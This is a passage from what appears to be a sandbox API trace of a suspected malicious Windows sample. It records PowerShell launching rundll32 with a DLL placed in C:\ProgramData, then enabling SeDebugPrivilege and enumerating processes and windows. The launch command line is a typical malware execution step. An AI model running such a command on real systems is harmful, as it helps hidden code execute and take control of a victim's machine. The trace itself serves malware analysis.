(_FileHandle=1) returned 0x7 [0215.049] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d9e194 | out: lpMode=0x49d9e194) returned 1 [0215.049] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.049] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d9e198 | out: lpMode=0x49d9e198) returned 1 [0215.050] SetConsoleInputExeNameW () returned 0x1 [0215.050] GetConsoleOutputCP () returned 0x1b5 [0215.050] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dabfe0 | out: lpCPInfo=0x49dabfe0) returned 1 [0215.050] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0215.050] exit (_Code=0) Process: id = "3" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x2b6e8000" os_pid = "0x988" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xad4" cmd_line = "powershell Start-Process rundll32.exe C:\\ProgramData\\DataExchange.dll,Start" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0x998 [0222.747] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0223.306] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0223.306] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0223.306] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0223.306] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0229.563] GetVersionExW (in: lpVersionInformation=0x16d880*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d880*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.566] GetVersionExW (in: lpVersionInformation=0x16d880*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d880*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0229.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0229.588] GetVersionExW (in: lpVersionInformation=0x16d5f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d5f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0229.589] SetErrorMode (uMode=0x1) returned 0x1 [0229.590] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16d750 | out: lpFileInformation=0x16d750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0229.593] SetErrorMode (uMode=0x1) returned 0x1 [0229.640] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16d9c0 | out: lpdwHandle=0x16d9c0) returned 0x94c [0229.645] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e77038 | out: lpData=0x2e77038) returned 1 [0229.649] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16d938, puLen=0x16d930 | out: lplpBuffer=0x16d938*=0x2e770d4, puLen=0x16d930) returned 1 [0229.652] lstrlenW (lpString="䅁") returned 1 [0229.669] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x2e771b0, puLen=0x16d8a0) returned 1 [0229.669] lstrlenW (lpString="Microsoft Corporation") returned 21 [0229.672] CoTaskMemAlloc (cb=0x2e) returned 0x3774d0 [0229.672] lstrcpyW (in: lpString1=0x3774d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0229.674] CoTaskMemFree (pv=0x3774d0) [0229.674] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x2e77204, puLen=0x16d8a0) returned 1 [0229.674] lstrlenW (lpString="System.Management.Automation") returned 28 [0229.674] CoTaskMemAlloc (cb=0x3c) returned 0x37b8f0 [0229.674] lstrcpyW (in: lpString1=0x37b8f0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0229.674] CoTaskMemFree (pv=0x37b8f0) [0229.674] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x2e77260, puLen=0x16d8a0) returned 1 [0229.674] lstrlenW (lpString="6.1.7601.17514") returned 14 [0229.674] CoTaskMemAlloc (cb=0x20) returned 0x381c20 [0229.674] lstrcpyW (in: lpString1=0x381c20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0229.674] CoTaskMemFree (pv=0x381c20) [0229.674] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x2e772a0, puLen=0x16d8a0) returned 1 [0229.674] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0229.674] CoTaskMemAlloc (cb=0x44) returned 0x37b8f0 [0229.674] lstrcpyW (in: lpString1=0x37b8f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0229.675] CoTaskMemFree (pv=0x37b8f0) [0229.675] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x2e77308, puLen=0x16d8a0) returned 1 [0229.675] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0229.675] CoTaskMemAlloc (cb=0x76) returned 0x31e620 [0229.675] lstrcpyW (in: lpString1=0x31e620, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0229.675] CoTaskMemFree (pv=0x31e620) [0229.675] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x2e773a4, puLen=0x16d8a0) returned 1 [0229.675] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0229.675] CoTaskMemAlloc (cb=0x44) returned 0x37b8f0 [0229.675] lstrcpyW (in: lpString1=0x37b8f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0229.675] CoTaskMemFree (pv=0x37b8f0) [0229.675] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x2e77408, puLen=0x16d8a0) returned 1 [0229.675] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0229.675] CoTaskMemAlloc (cb=0x58) returned 0x2df660 [0229.675] lstrcpyW (in: lpString1=0x2df660, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0229.675] CoTaskMemFree (pv=0x2df660) [0229.675] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x2e77484, puLen=0x16d8a0) returned 1 [0229.675] lstrlenW (lpString="6.1.7601.17514") returned 14 [0229.675] CoTaskMemAlloc (cb=0x20) returned 0x381c20 [0229.675] lstrcpyW (in: lpString1=0x381c20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0229.675] CoTaskMemFree (pv=0x381c20) [0229.675] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x2e7712c, puLen=0x16d8a0) returned 1 [0229.675] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0229.675] CoTaskMemAlloc (cb=0x66) returned 0x3799c0 [0229.676] lstrcpyW (in: lpString1=0x3799c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0229.676] CoTaskMemFree (pv=0x3799c0) [0229.676] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x0, puLen=0x16d8a0) returned 0 [0229.676] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x0, puLen=0x16d8a0) returned 0 [0229.676] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16d8a8, puLen=0x16d8a0 | out: lplpBuffer=0x16d8a8*=0x0, puLen=0x16d8a0) returned 0 [0229.676] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16d878, puLen=0x16d870 | out: lplpBuffer=0x16d878*=0x2e770d4, puLen=0x16d870) returned 1 [0229.729] CoTaskMemAlloc (cb=0x204) returned 0x3222e0 [0229.729] VerLanguageNameW (in: wLang=0x0, szLang=0x3222e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0229.730] CoTaskMemFree (pv=0x3222e0) [0229.731] VerQueryValueW (in: pBlock=0x2e77038, lpSubBlock="\\", lplpBuffer=0x16d8c8, puLen=0x16d8c0 | out: lplpBuffer=0x16d8c8*=0x2e77060, puLen=0x16d8c0) returned 1 [0229.756] GetCurrentProcessId () returned 0x988 [0229.886] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16c7f0 | out: lpLuid=0x16c7f0*(LowPart=0x14, HighPart=0)) returned 1 [0229.891] GetCurrentProcess () returned 0xffffffffffffffff [0229.892] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16c810 | out: TokenHandle=0x16c810*=0x2f0) returned 1 [0229.895] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2e7a8b0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0229.898] CloseHandle (hObject=0x2f0) returned 1 [0229.911] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x2f0 [0229.923] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2e7a918, cb=0x200, lpcbNeeded=0x16d828 | out: lphModule=0x2e7a918, lpcbNeeded=0x16d828) returned 1 [0229.931] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13fe30000, lpmodinfo=0x2e7ab88, cb=0x18 | out: lpmodinfo=0x2e7ab88*(lpBaseOfDll=0x13fe30000, SizeOfImage=0x77000, EntryPoint=0x13fe3c63c)) returned 1 [0229.932] CoTaskMemAlloc (cb=0x804) returned 0x389260 [0229.932] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13fe30000, lpBaseName=0x389260, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0229.932] CoTaskMemFree (pv=0x389260) [0229.933] CoTaskMemAlloc (cb=0x804) returned 0x389260 [0229.933] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13fe30000, lpFilename=0x389260, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0229.934] CoTaskMemFree (pv=0x389260) [0229.935] CloseHandle (hObject=0x2f0) returned 1 [0229.949] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x988) returned 0x2f0 [0229.952] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x16d958 | out: lpExitCode=0x16d958*=0x103) returned 1 [0229.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e7b088, Length=0x20000, ResultLength=0x16d920 | out: SystemInformation=0x12e7b088, ResultLength=0x16d920*=0x11980) returned 0x0 [0230.003] GetWindowThreadProcessId (in: hWnd=0x50394, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.003] GetWindowThreadProcessId (in: hWnd=0x40328, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.003] GetWindowThreadProcessId (in: hWnd=0x5038e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.004] GetWindowThreadProcessId (in: hWnd=0x4033e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.004] GetWindowThreadProcessId (in: hWnd=0x40334, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.004] GetWindowThreadProcessId (in: hWnd=0x300b0, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.004] GetWindowThreadProcessId (in: hWnd=0x300d6, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.004] GetWindowThreadProcessId (in: hWnd=0x300c0, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.004] GetWindowThreadProcessId (in: hWnd=0x1013c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x50c [0230.005] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x5a4 [0230.005] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.005] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.005] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.005] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.005] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.006] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.006] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.006] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.006] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.006] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x45c [0230.006] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.006] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.007] GetWindowThreadProcessId (in: hWnd=0x2039c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.007] GetWindowThreadProcessId (in: hWnd=0x20292, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.007] GetWindowThreadProcessId (in: hWnd=0x30392, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x998 [0230.008] GetWindow (hWnd=0x30392, uCmd=0x4) returned 0x0 [0230.009] IsWindowVisible (hWnd=0x30392) returned 0 [0230.009] GetWindowThreadProcessId (in: hWnd=0x70108, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x484 [0230.010] GetWindowThreadProcessId (in: hWnd=0x20228, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.010] GetWindowThreadProcessId (in: hWnd=0x2032a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.011] GetWindowThreadProcessId (in: hWnd=0x202fe, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.011] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x694 [0230.011] GetWindowThreadProcessId (in: hWnd=0x202e2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.011] GetWindowThreadProcessId (in: hWnd=0x302ba, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.011] GetWindowThreadProcessId (in: hWnd=0x10266, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.011] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x91c [0230.011] GetWindowThreadProcessId (in: hWnd=0x90254, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.012] GetWindowThreadProcessId (in: hWnd=0x900a0, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.012] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xaa8 [0230.012] GetWindowThreadProcessId (in: hWnd=0x302b8, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.012] GetWindowThreadProcessId (in: hWnd=0x202b2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.012] GetWindowThreadProcessId (in: hWnd=0x10288, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xae8 [0230.012] GetWindowThreadProcessId (in: hWnd=0x300e2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.012] GetWindowThreadProcessId (in: hWnd=0x400c2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.012] GetWindowThreadProcessId (in: hWnd=0x400ea, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.012] GetWindowThreadProcessId (in: hWnd=0x300c8, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.013] GetWindowThreadProcessId (in: hWnd=0x300bc, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.013] GetWindowThreadProcessId (in: hWnd=0x400b2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.013] GetWindowThreadProcessId (in: hWnd=0x300cc, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x4c4 [0230.013] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa98 [0230.013] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa88 [0230.013] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa78 [0230.013] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa68 [0230.013] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa58 [0230.014] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa48 [0230.014] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa38 [0230.014] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa28 [0230.014] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa18 [0230.014] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0xa08 [0230.014] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9f8 [0230.014] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9e8 [0230.014] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9d8 [0230.014] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9c8 [0230.015] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9b4 [0230.015] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x9a4 [0230.015] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x994 [0230.015] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x984 [0230.015] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x974 [0230.015] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x964 [0230.015] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x954 [0230.015] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x944 [0230.016] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x934 [0230.016] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x924 [0230.016] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x914 [0230.016] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x904 [0230.016] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8f4 [0230.016] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8e4 [0230.016] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8d4 [0230.016] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8c4 [0230.017] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8b4 [0230.017] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x8a4 [0230.017] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x894 [0230.017] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x884 [0230.017] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x874 [0230.017] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x864 [0230.017] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x854 [0230.018] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x844 [0230.018] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x834 [0230.018] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x824 [0230.018] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x814 [0230.018] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x804 [0230.018] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x7bc [0230.018] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x1c4 [0230.018] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x16d680 | out: lpdwProcessId=0x16d680) returned 0x2a8 